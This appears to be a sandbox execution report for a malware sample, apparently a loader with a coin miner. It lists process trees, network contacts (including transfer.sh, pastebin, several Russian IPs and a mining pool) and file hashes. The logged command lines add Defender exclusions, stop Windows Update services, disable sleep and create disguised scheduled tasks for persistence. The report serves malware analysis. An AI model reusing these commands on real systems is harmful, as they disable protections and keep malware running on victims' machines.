PID 4584 wrote to memory of 700 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4564 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4564 wrote to memory of 4580 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 4720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 4720 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 820 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 4536 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 4536 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 3700 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 3700 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 3700 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 3700 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 3700 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 3700 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4580 wrote to memory of 3700 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe

"C:\Users\Admin\AppData\Local\Temp\246580aed9d35564ddba5061b5ce2293a7daadd4f4dc4e8ec393130eea2a3469.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=63516 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data65NI1" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff987329758,0x7ff987329768,0x7ff987329778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1256 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1556 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=63516 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1892 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=63516 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2144 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=63516 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2356 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=63516 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2980 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=63516 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3156 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=63516 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3276 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=3448 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x398

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=3168 --field-trial-handle=1388,i,6264700549726101065,1029694166062952978,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 280

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#xjuusllbjmyevclq#> powershell <#xjuusllbjmyevclq#> -Verb <#xjuusllbjmyevclq#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 10:13 /f /tn InternetExplorerTask_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 10:13 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
PL 51.83.170.21:19447 tcp
US 8.8.8.8:53 21.170.83.51.in-addr.arpa udp
US 8.8.8.8:53 4.5.4.6.5.6.4.7.3.6.5.6.0.0.0.0.f.f.f.f.9.b.b.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 100.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
US 8.8.8.8:53 apis.google.com udp
DE 172.217.23.206:443 apis.google.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.150:443 i.ytimg.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 174.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 150.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.251.36.14:443 play.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 98.39.251.142.in-addr.arpa udp
NL 142.251.36.2:443 googleads.g.doubleclick.net tcp
NL 142.251.36.2:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 2.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com udp
NL 142.250.179.150:443 i.ytimg.com udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
NL 142.251.39.106:443 jnn-pa.googleapis.com tcp
US 8.8.8.8:53 static.doubleclick.net udp
NL 142.251.39.106:443 jnn-pa.googleapis.com udp
NL 142.251.36.6:443 static.doubleclick.net tcp
US 8.8.8.8:53 106.39.251.142.in-addr.arpa udp
US 8.8.8.8:53 6.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 71.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
RU 185.159.129.168:80 tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 185.149.146.118:80 tcp
RU 77.91.77.144:80 tcp
N/A 127.0.0.1:63516 tcp
N/A 127.0.0.1:63516 tcp
N/A 127.0.0.1:63516 tcp
N/A 127.0.0.1:63516 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:80 pastebin.com tcp
US 104.20.67.143:443 pastebin.com tcp
RU 46.29.235.84:80 46.29.235.84 tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 84.235.29.46.in-addr.arpa udp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 252.15.104.51.in-addr.arpa udp

Files

memory/3812-118-0x0000000001A40000-0x0000000001A69000-memory.dmp

memory/3812-119-0x0000000001A70000-0x0000000001AAF000-memory.dmp

memory/3812-120-0x0000000000400000-0x00000000018D1000-memory.dmp

memory/3812-122-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-121-0x0000000003950000-0x0000000003988000-memory.dmp

memory/3812-123-0x00000000737E0000-0x0000000073ECE000-memory.dmp

memory/3812-125-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-124-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-126-0x0000000005F00000-0x00000000063FE000-memory.dmp

memory/3812-127-0x0000000003910000-0x0000000003944000-memory.dmp

memory/3812-128-0x00000000037A0000-0x00000000037A6000-memory.dmp

memory/3812-129-0x00000000065B0000-0x0000000006BB6000-memory.dmp

memory/3812-130-0x0000000006BC0000-0x0000000006CCA000-memory.dmp

memory/3812-132-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-131-0x0000000006CD0000-0x0000000006CE2000-memory.dmp

memory/3812-133-0x0000000006CF0000-0x0000000006D2E000-memory.dmp

memory/3812-134-0x0000000006D90000-0x0000000006DDB000-memory.dmp

memory/3812-135-0x0000000001A40000-0x0000000001A69000-memory.dmp

memory/3812-136-0x0000000000400000-0x00000000018D1000-memory.dmp

memory/3812-137-0x0000000001A70000-0x0000000001AAF000-memory.dmp

memory/3812-138-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-139-0x00000000737E0000-0x0000000073ECE000-memory.dmp

memory/3812-140-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-141-0x0000000006ED0000-0x0000000006F46000-memory.dmp

memory/3812-142-0x0000000006F50000-0x0000000006FE2000-memory.dmp

memory/3812-143-0x0000000006FF0000-0x0000000007056000-memory.dmp

memory/3812-144-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-145-0x0000000007950000-0x0000000007B12000-memory.dmp

memory/3812-146-0x0000000007B20000-0x000000000804C000-memory.dmp

memory/3812-147-0x0000000005EF0000-0x0000000005F00000-memory.dmp

memory/3812-148-0x00000000093E0000-0x0000000009430000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

memory/4940-160-0x0000000000960000-0x0000000000BEB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\cc.exe

MD5 858f82fe9166c34b6709a3adfe6a625f
SHA1 63275e4b77e0fe6fa6f1db716b5963b69b68f8a5
SHA256 8ec2c1bb10e05a5129269488b53a46c6b5be3691c61ef7da7c6eecf1c0444b28
SHA512 1338082ebb6bf658125cd6d72f5885c78865c1abbed50fd10317dacaf41a450eb98b949631f1a1b94a67d335b23cfc0fa78d0d8db3d726adf2a57af50307b89e

memory/4564-165-0x0000000000D50000-0x0000000001384000-memory.dmp

memory/4564-170-0x0000000000D50000-0x0000000001384000-memory.dmp

memory/4564-174-0x00000000032D0000-0x0000000003340000-memory.dmp

memory/4564-168-0x0000000077754000-0x0000000077755000-memory.dmp

memory/3812-171-0x0000000000400000-0x00000000018D1000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
SHA512 3bec158714630e6d38867ddba74eda37e036fa2d31c3b3b83229ab593ee85e36c9964aebb31a847bb5b0e65932d8fcfe0860cb6b2a7a31c10204887daa018e08

memory/4564-178-0x00000000036B0000-0x000000000371C000-memory.dmp

memory/4564-177-0x00000000737E0000-0x0000000073ECE000-memory.dmp

C:\Windows\Temp\setup.exe

MD5 bc202c47461acbe8bef80e143eb3a364
SHA1 0ef433c2e54c4097f0ac3dc722fb9e4e7b7c2634
SHA256 df144eec828ac28a99d5d148493b3a4c8f36fce79ea7c41c08511ff69d6762bb
